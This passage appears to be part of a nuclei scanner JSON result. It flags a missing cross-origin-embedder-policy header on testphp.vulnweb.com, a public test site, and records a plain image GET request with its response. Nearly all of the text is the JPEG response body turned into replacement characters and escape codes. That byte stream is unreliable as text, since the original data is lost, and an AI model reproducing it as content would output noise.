Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\